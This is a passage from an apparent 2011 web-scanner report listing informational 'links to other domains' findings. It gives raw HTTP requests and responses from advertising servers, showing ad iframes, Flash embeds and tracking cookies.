5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:49 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0013.rm.sp2
Set-Cookie: ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!$=3f.'"; path=/; expires=Thu, 05-Sep-2013 12:29:49 GMT
Set-Cookie: vuday1=4M6Eq4M6Eq!79C88CF`W; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=*YKly!79C86nkxc; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:29:49 GMT
Pragma: no-cache
Content-Length: 996
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10070732);}
</script><IFRAME SRC="http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ads.bluelithium.com/clk?3,eAGlUMtyqkAQ.Zm7umWYGWaYR6hZjIjEhFExGGM2KQyI4SEEKQ35-kuiN5V9etHnnK7u09WNsB1bdAP7hGPKk2Qb2QibONkwgng8gLZtU2GaBFuEDzR098PtYe0FI.1W5-orbtjxNjhTlX7i5Czm.BNHztjsnHNFjZl-v9BfwrCLTvri0e.72qtUtvTwPJsMv829pTX9CIgOp5m.CshspFsdjgvtwL6evvvhC3kK41yHD-XU1GR9-p6Ug13b1tcApEW1iQojamKji3ZVZbxUJbifeBJZh4iKusJAS8YZx9hAhHAKOelJ.0OBoIFMyxK9ACMZFUXZbRtwLzGFFPc.pdf-wnXAWq7VzWwG3Me5RBhZGAnMGfBls3RSJTKeHB9rtaizsDBOWZBrvYtZlFulmx2Uel0xMJRJthLztm8t-BW4vdiYiDMsBKYWuJP7t-L5IXRz2PgpfU5OdwGEXgCUpCYnFAuwkBD8.fP.7G1T7dvXpDHK7sfd.wDSGZ6s,;ord=1315312189?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'></iframe>
...[SNIP]...

15.42. http://admin.brightcove.com/js/BrightcoveExperiences_all.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin.brightcove.com
Path:   /js/BrightcoveExperiences_all.js

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /js/BrightcoveExperiences_all.js?_=1315331549705 HTTP/1.1
Host: admin.brightcove.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/residential/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "d52c6bad72ca07cc18f5abe52bb678ce:1312344056"
Last-Modified: Wed, 03 Aug 2011 04:00:54 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 101745
Cache-Control: max-age=1200
Date: Tue, 06 Sep 2011 12:52:29 GMT
Connection: close


if(brightcove==undefined){var brightcove={};brightcove.getExperience=function(){alert("Please import APIModules_all.js in order to use the API.");};}
if(brightcove.experiences==undefined){brightcove.
...[SNIP]...
th-1)=="%"){container.style.display='block';}else{container.style.display='inline-block';}
container.id=containerID;var cdnURL=secureConnections?brightcove.secureCDNURL:brightcove.cdnURL;var linkHTML="<a href='http://www.adobe.com/go/getflash/' target='_blank'><img src='"+cdnURL+"/viewer/upgrade_flash_player2.gif' alt='Get Flash Player' width='314' height='200' border='0'>
...[SNIP]...

15.43. http://adserver.teracent.net/tase/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_798137&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=826091&rcu=http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/* HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313287575_68349120_as3107_imp|305#1315313287575_68349120_as3107_imp|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1315313297486_68372787_as3103_imp|305#1315313297486_68372787_as3103_imp|374#1315258459362_65704651_as3105_imp|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:17 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:17 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:16 GMT
Content-Length: 2560

<!DOCTYPE html>
<!-- Impression Id: 1315313297486_68372787_as3103_imp -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>

...[SNIP]...
<div id="tera-1315313297486_68372787_as3103_imp" class="tera-ad">
<a class="inner" href="http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0JStH5SrYW2GFmLxOgJisqJEI-GI6dKEEl37ImqBl26cHh8JL733uPrd6pnO80-xLq4y2RBa3ajRZdG-waEIJG5AzZm7z58SE1kUqiZ9u4aazN6S8huPlkgAKOQBClWLvtztAIBBtQDqgHxOcmF8dfJBCS07Ixyaf0vDMqQFNLIYR4JkIb08O7TjilE-5XqXJfYT_OtlH4pj4PzpW1SqRYEsG4ADAeXU43tr0DJkpvScMJkd-UY8lzXvyRKSySibu_8tV1rg10nEdA0yIaELDsAxme8Jdgl393pmO0tBP-y3c5rv5bTJcclp-Xe1xi2zbERRAY6oWDDsnVnNG7uP6lyLdNoAQAA" title="Click to find out more." target="_blank">&nbsp;</a>
...[SNIP]...

15.44. http://adserver.teracent.net/tase/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_165052&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=147582&rcu=http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/* HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313083608_171477072_ap3104_int|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1315313287862_68296079_as3105_imp|305#1315313287862_68296079_as3105_imp|374#1315258459362_65704651_as3105_imp|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:07 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:07 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:07 GMT
Content-Length: 2563

<!DOCTYPE html>
<!-- Impression Id: 1315313287862_68296079_as3105_imp -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>

...[SNIP]...
<div id="tera-1315313287862_68296079_as3105_imp" class="tera-ad">
<a class="inner" href="http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313287862_68296079_as3105_imp?q=H4sIAAAAAAAAAFVQS24DIQy9is2YX8qeXUbdRskcoSqToEx3iDApiQKcoeqFS6puurFkv6f38Ve6fzvDkGxxfjGv9ehLaKv1swEGxIANWmg52DybHTAEgUQcSOu9fXM-mx3ninPN-u4NDEppKbjgHJS9pmbwj9WlJEgSe5vb2SzB-dSiDafugiS6IHDZQ7ybOftkPnMLLaZxCbdax1gfB-tqR3Jt3QOomyDBwZbcUl7NgIIE9Yt112cGjZwLBNTMzj3BZTGg1LPhOXUuwIRqQjkh_k5mu8S_spPUg5Io1BRmBkhTfjgbojex3O3pWMzNe_ey3YZ1XOvpUlIsOd7Hlvy2MzYDk5KYJtqQ6O_SCjcfP8-Kd0NoAQAA" title="Click to find out more." target="_blank">&nbsp;</a>
...[SNIP]...

15.45. http://as.casalemedia.com/j

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /j?s=100511&u=http%3A%2F%2Fgames.frontier.com%2F&a=4&id=662812798&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=3;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMO=2

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Tue, 06 Sep 2011 12:45:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:45:56 GMT
Content-Length: 263
Connection: close

document.write('<iframe src="http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80254/;ord=2555908891" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>
...[SNIP]...

15.46. http://as.casalemedia.com/j

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /j?s=100511&u=http%3A%2F%2Fgames.frontier.com%2Fgame.htm%3Fcode%3D119282623%26lc%3Den%26channel%3D110464377&a=4&id=80702107&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMO=2

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Tue, 06 Sep 2011 12:50:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:50:51 GMT
Content-Length: 263
Connection: close

document.write('<iframe src="http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80254/;ord=2556211177" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>
...[SNIP]...

15.47. http://as.casalemedia.com/j

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /j?s=100511&u=http%3A%2F%2Fgames.frontier.com%2Fgame.htm%3Fcode%3D119282623%26lc%3Den%26channel%3D110464377&a=4&id=80698544&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=3;sz=300x250;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMO=2

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Tue, 06 Sep 2011 12:50:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:50:51 GMT
Content-Length: 1276
Connection: close

document.write('<div style="width: 300; height: 250; margin: 0px; padding: 0px; overflow: hidden;"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" id="CASALE_FLASH_2556210827" width="300" height="250" style="background-color: #FFFFFF; display: block"><param name="movie" value="http://cdn.optmd.com/V2/81064/204880/CasaleMedia_300x250_Crv119-2.swf?clickTAG=http%3A%2F%2Fc.casalemedia.com%2Fc%2F4%2F1%2F81064%2FaHR0cDovL3d3dy5yZWFsYWdlLmNvbS9sYW5kaW5nL2
...[SNIP]...
<param name="bgcolor" value="#FFFFFF"><embed quality="high" wmode="transparent" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" src="http://cdn.optmd.com/V2/81064/204880/CasaleMedia_300x250_Crv119-2.swf?clickTAG=http%3A%2F%2Fc.casalemedia.com%2Fc%2F4%2F1%2F81064%2FaHR0cDovL3d3dy5yZWFsYWdlLmNvbS9sYW5kaW5nL2VudHJ5ND9jYnI9Q0FTQUxFMzE%3D" allowScriptAccess="always" loop="1" bgcolor="#FFFFFF" width="300" height="250"></embed>
...[SNIP]...

15.48. http://as.casalemedia.com/j

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /j?s=100511&u=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D4%3Bsz%3D728x90%3Bord%3D8383746361359954%3F&a=2&id=663152446&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMO=2

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Tue, 06 Sep 2011 12:45:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:45:34 GMT
Content-Length: 178
Connection: close

document.write('<iframe src="http://cdn.optmd.com/V2/80181/197813/index.html" width="728" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>');

15.49. http://as.casalemedia.com/j

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /j?s=100511&u=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_119282623%3Bdc_seed%3D%3Btile%3D4%3Bsz%3D728x90%3Bord%3D278143426403403.28%3F&a=2&id=81046827&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMO=2

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Tue, 06 Sep 2011 12:50:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:50:52 GMT
Content-Length: 261
Connection: close

document.write('<iframe src="http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80254/;ord=2556211545" width="728" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>
...[SNIP]...

15.50. http://as1.suitesmart.com/99917/G15493.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as1.suitesmart.com
Path:   /99917/G15493.js

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /99917/G15493.js?GID=15493 HTTP/1.1
Host: as1.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 17 Aug 2011 22:50:01 GMT
ETag: "50ff5-e42-4aabb50f9d840"
Accept-Ranges: bytes
Content-Length: 3650
Content-Type: application/x-javascript
Date: Tue, 06 Sep 2011 12:44:41 GMT
Connection: close
Cache-Control: no-store

var _fSet={red:{15493 : 0},map:{},tgi:null,pnp:{},pix:0};function _FGet(){var jTags=document.getElementsByTagName('script');var jTag=jTags[jTags.length-1];var isFTG=(jTag.src.match(/suitesmart.*\/[0-9
...[SNIP]...
;this.no5e=this.tP['NO5']?this.tP['NO5']:0;}function _FtG5(s,g){var o=document.createElement('DIV');o.style.width='0px';o.style.height='0px';o.display='inline';o.style.position='absolute';o.innerHTML='<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="0" HEIGHT="0" id="_f5e"> <PARAM NAME="movie" VALUE="'+s+'/_f5e.swf">
...[SNIP]...

15.51. http://autos.yahoo.com/darla/fc.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.yahoo.com
Path:   /darla/fc.php

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=autos&f=2022006494&l=OEM,FIN,N,LREC,MREC&en=utf-8&npv=1&rn=1315331283021&em=%7B%22site-attribute%22%3A%22content%3D%27autosch%3D%22%26brand%3Db%26model_year%3D2011%26Make%3DBentley%26Model%3DContinental%20GTC%26price1%3D191208-219573%26price2%3D205600-236100%22%20content%3D%22Coupes%3BConvertibles%3BAll%20Cars%22%27%22%7D&t_e=1&.intl=us HTTP/1.1
Host: autos.yahoo.com
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/bentley/continental-gtc/2011/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; AutosBH=bh=W1siMjAxMTA5MDZfMDU6NDU6NDIiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9tZC5waHA_ZW49dXRmLTgiXSxbIjIwMTEwOTA2XzA1OjQ1OjQwIiwiYXV0b3MueWFob28uY29tXC9kYXJsYVwvZmMucGhwP2NiPVlBSE9PLmFkcy5kYXJsYS5fbG9hZGVkJmFtcDtwPWF1dG9zJmFtcDtmPTk2NDMyOTAwJmFtcDtsPUxSRUMmYW1wO2VuPXV0Zi04JmFtcDtucHY9MSZhbXA7cm49MTMxNTMzMTE0MDc3MyZhbXA7ZW09JTdCJTIyc2l0ZS1hdHRyaWJ1dGUlMjIlM0ElMjJjb250ZW50JTNEJTI3YXV0b3NjaCUzRCUyMiUyMiUyMGNvbnRlbnQlM0QlMjJBbGwlMjBDYXJzJTNCJTIyJTI3JTIyJTdEJmFtcDt0X2U9MSZhbXA7LmludGw9dXMiXV0-&ver=1; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:03 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: AutosBH=bh=W1siMjAxMTA5MDZfMDU6NDg6MDMiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9mYy5waHA_...[SNIP]...ZW49dXRmLTgiXSxbIjIwMTEwOTA2XzA1OjQ1OjQwIiwiYXV0b3MueWFob28uY29tXC9kYXJsYVwvZmMucGhwP2NiPVlBSE9PLmFkcy5kYXJsYS5fbG9hZGVkJmFtcDtwPWF1dG9zJmFtcDtmPTk2NDMyOTAwJmFtcDtsPUxSRUMmYW1wO2VuPXV0Zi04JmFtcDtucHY9MSZhbXA7cm49MTMxNTMzMTE0MDc3MyZhbXA7ZW09JTdCJTIyc2l0ZS1hdHRyaWJ1dGUlMjIlM0ElMjJjb250ZW50JTNEJTI3YXV0b3NjaCUzRCUyMiUyMiUyMGNvbnRlbnQlM0QlMjJBbGwlMjBDYXJzJTNCJTIyJTI3JTIyJTdEJmFtcDt0X2U9MSZhbXA7LmludGw9dXMiXV0-&ver=1; expires=Wed, 07-Sep-2011 00:48:03 GMT; path=/; domain=autos.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 12464

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128gpapt0(gid$5iP7EWKIR.bpARpjTl.wjRoFMhd7ak5mFoMACKWt,st$1315313283571947,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.52. http://autos.yahoo.com/darla/fc.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.yahoo.com
Path:   /darla/fc.php

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=autos&f=96432900&l=LREC&en=utf-8&npv=1&rn=1315331140773&em=%7B%22site-attribute%22%3A%22content%3D%27autosch%3D%22%22%20content%3D%22All%20Cars%3B%22%27%22%7D&t_e=1&.intl=us HTTP/1.1
Host: autos.yahoo.com
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: AutosBH=bh=W1siMjAxMTA5MDZfMDU6NDY6MTIiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9mYy5waHA_...[SNIP]...&ver=1; expires=Wed, 07-Sep-2011 00:46:12 GMT; path=/; domain=autos.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
